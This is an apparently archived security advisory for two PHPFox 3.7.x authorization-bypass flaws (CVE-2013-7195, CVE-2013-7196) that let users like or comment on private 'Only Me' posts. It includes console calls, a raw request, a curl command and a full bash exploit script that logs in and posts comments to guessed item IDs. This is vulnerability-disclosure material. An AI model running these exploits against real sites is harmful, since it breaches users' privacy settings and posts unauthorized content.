PHPFox 3.7.5 Authorization Bypass

2014-04-05T00:00:00
ID PACKETSTORM:126035
Type packetstorm
Reporter Wesley Henrique Leite
Modified 2014-04-05T00:00:00

Description

                                        
                                            `-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256  
  
CNA primary  
MITRE Corporation ( cve-assign@mitre.org )  
  
  
Software Vendors  
PHPFox ( http://www.phpfox.com )  
Product ( http://demo.phpfox.com )  
Version: v3.7.3, v3.7.4 and v3.7.5  
  
Research  
Wesley Henrique Leite ( wesleyhenrique [\\NOSPAM**] gmail \\NOSPAM// com )  
  
  
[+] INFORMATION  
Vendor Notified : 2013-12-13  
Vendor Homepage : www.phpfox.com  
  
[+] CVEID  
CVE-2013-7195  
CVE-2013-7196  
  
Released fix 2014-02-26:  
[+] Flag as "like" a publication set to "Only Me"  
Update to version v3.7.5  
Released fix 2014-04-03:  
[+] Comment on a publication set to "Only Me"  
Update to version v3.7.6  
  
Description of the problem:  
[ + ] Flag as "like" a publication set to "Only Me" (v3.7.3 and v3.7.4)  
[ + ] Comment on a publication set to "Only Me" (v3.7.3, v3.7.4 and v3.7.5)  
  
  
[ + ] Flag as "like" a publication set to "Only Me" (v3.7.3 and v3.7.4)  
  
  
Analyzing how the "comment" and "like" are added to a publication, it  
was possible to manipulate them so that a publication set to "ONLY ME"  
can receive an external comment or mark this as "like", not even having  
any relationship with the user. The private publications "Only me" can  
easily be discovered by analyzing the source of the page, since all  
receive a unique identifier, to know these identifiers in the source  
one can easily identify the holes in the sequence.  
  
  
$Core.Like.Actions.doLike(0, 'user_status', 26, 0, this);  
$Core.Like.Actions.doLike(0, 'user_status', 28, 0, this);  
$Core.Like.Actions.doLike(0, 'user_status', 30, 0, this);  
$Core.Like.Actions.doLike(0, 'user_status', 33, 0, this);  
  
  
Unique ID Possible Privacy  
26------------> public  
27------------> removed or private  
28------------> public  
29------------> removed or private  
30------------> public  
31------------> removed or private  
32------------> removed or private  
33------------> public  
  
  
this logic can be applied to other types of publications such as videos,  
links and so on.  
  
  
to exemplify, we will asume that the post with ID 27 is private "ONLY ME", and  
to mark the publication with ID 27 as "like", just use the code below  
in your browser console:  
  
  
javascript console:  
$Core.Like.Actions.doLike(0, 'user_status', 27, 0, this);  
  
  
the account will be notified and will appear in the same publication  
that was marked as "like" of the user who ran the code above.  
  
  
The above problem can be found in version v3.7.3 and v3.7.4 all build.  
  
  
[ + ] Comment on a publication set to "Only Me" (v3.7.3, v3.7.4 and v3.7.5)  
  
  
following the logic above, we can identify possible private publications.  
We'll get the ID 27 and add a comment, remembering that it is private "Only me".  
  
  
these are variables of a comment.  
  
  
&core[ajax]=true&core[call]=comment.add&core[security_token]=686f82ec43f7dcd92784ab36ab5cbfb7  
&val[type]=user_status&val[item_id]=27&val[parent_id]=0&val[is_via_feed]=0&  
val[default_feed_value]=Write%20a%20comment...&val[text]=AQUI!!!!!!!!!!!&  
core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=290  
  
  
Variables that can be manipulated.  
  
  
val[text] -------> Text of comment  
val[type] -------> user_status, photo, music_song, poll, link, blog  
val[item_id] -------> Unique ID  
  
  
to make the process more dynamic the script below was created.  
  
  
$ curl 'http://demo.phpfox.com/static/ajax.php' \  
'SET HERE COOKIE AND HEAD INFO FOR YOUR USER ACCOUNT' \  
- --data '&core[ajax]=true&core[call]=comment.add&core[security_token]=686f82ec43f7dcd92784ab36ab5cbfb7&val[type]=user_status&val[item_id]=27&val[parent_id]=0&val[is_via_feed]=0&val[default_feed_value]=Write%20a%20comment...&val[text]=AQUI!!!!!!!!!!!&core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=290'  
  
this information can also be manipulated directly in the console.  
  
The above problem can be found in version v3.7.3, v3.7.4 and v3.7.5 all build.  
  
################  
# SCRIPT  
################  
#!/bin/bash  
  
# This script was developed for demonstrat development team  
# phpFox of the problem, can be easily adapted for testing  
# other applications that use the framework, just by adjusting  
# the variable "${TARGET}"  
#  
# Comments are published with the credentials defined on variables  
#  
# USERACCOUNT = "your_mail%40example.com"  
# USERPASSWD = "your_password"  
#  
# even in the absence relationship between users or publication  
# being set to "Only Me" in the case is the focus of this study,  
# the review will be added.  
#  
# Wesley Henrique Leite  
# wesleyhenrique **(A)** gmail **NOSPAM** com  
# wesley **(A)** telapreta **NOSPAM** com **NOSPAM** br  
#  
# USAGE:  
# $ comment_only-me.bash <user_status|photo|music_song|poll|link|blog>  
777 'Hello all'  
#  
  
#AUTH  
# encode  
# @ = %40 -> teste%40example.com  
USERACCOUNT=""  
USERPASSWD=""  
COOKIE=cookie.txt  
SECTOKEN=""  
TYPE="$1"  
ITEM_ID=$2  
MSG="$3"  
TARGET="http://demo.phpfox.com"  
URL_LOGIN="${TARGET}/user/login"  
URL_AJAX="${TARGET}/static/ajax.php"  
USER_AGENT="User-Agent: Mozilla/5.0 (X11; Linux x86_64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107  
Safari/537.36"  
  
  
USAGE="Type Item_id and MSG is required\n $0  
<user_status|photo|music_song|poll|link|blog> 777 'Hello all' "  
  
[ -z "${USERACCOUNT}" -o \  
-z "${USERPASSWD}" ] && {  
echo "Open $0 file and edit USERACCOUNT and USERPASSWD"  
exit  
}  
  
[ $# -eq 3 -a \  
! -z "${TYPE}" -a \  
! -z "${ITEM_ID}" -a \  
! -z "${MSG}" ] || { echo -e "${USAGE}" ; exit ; }  
  
>${COOKIE}  
  
# GET COOKIE AND SECURITY_TOKEN  
SECTOKEN=$(curl -D ${COOKIE} ${TARGET} |  
grep 'security_token' |  
grep -Ewo '([a-f0-9A-F]){32}' |  
sort -u)  
  
# AUTH USER  
# SAVE COOKIE  
curl "${URL_LOGIN}" \  
-b "${COOKIE}" \  
-H "Origin: ${TARGET}" \  
-H 'Accept-Encoding: gzip,deflate,sdch' \  
-H 'Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.6,en;q=0.4' \  
-H "${USER_AGENT}" \  
-H 'Content-Type: application/x-www-form-urlencoded' \  
-H 'Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'  
\  
-H 'Cache-Control: max-age=0' \  
-H 'Connection: keep-alive' \  
-D ${COOKIE} \  
--data "core%5Bsecurity_token%5D=${SECTOKEN}&val%5Blogin%5D=${USERACCOUNT}&val%5Bremember_me%5D=&val%5Bpassword%5D=${USERPASSWD}"  
\  
--compressed  
  
  
### COMMENT ADD  
curl "${URL_AJAX}" \  
-b "${COOKIE}" \  
-H "Origin: ${TARGET}" \  
-H "${USER_AGENT}" \  
-H 'Content-Type: application/x-www-form-urlencoded' \  
-H 'Accept: text/javascript, application/javascript,  
application/ecmascript, application/x-ecmascript, */*; q=0.01' \  
-H 'X-Requested-With: XMLHttpRequest' \  
-H 'Connection: keep-alive' \  
--data "&core[ajax]=true&core[call]=comment.add&core[security_token]=${SECTOKEN}&val[type]=${TYPE}&val[item_id]=${ITEM_ID}&val[parent_id]=0&val[is_via_feed]=${ITEM_ID}&val[default_feed_value]=Write%20a%20comment...&val[text]=${MSG}&core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=290"  
\  
--compressed  
  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.12 (GNU/Linux)  
  
iF4EAREIAAYFAlM/lEEACgkQd9Htm4AVoW9ToAEAnnZogdYRlKCi3RDfJgkLvbK8  
RIQcsz5fsiU9d3nrVKwBAIJFfcsdfVspUpExdtuEFgPJ7Sj7thHURfVHvFGSXvvj  
=6hMg  
-----END PGP SIGNATURE-----  
`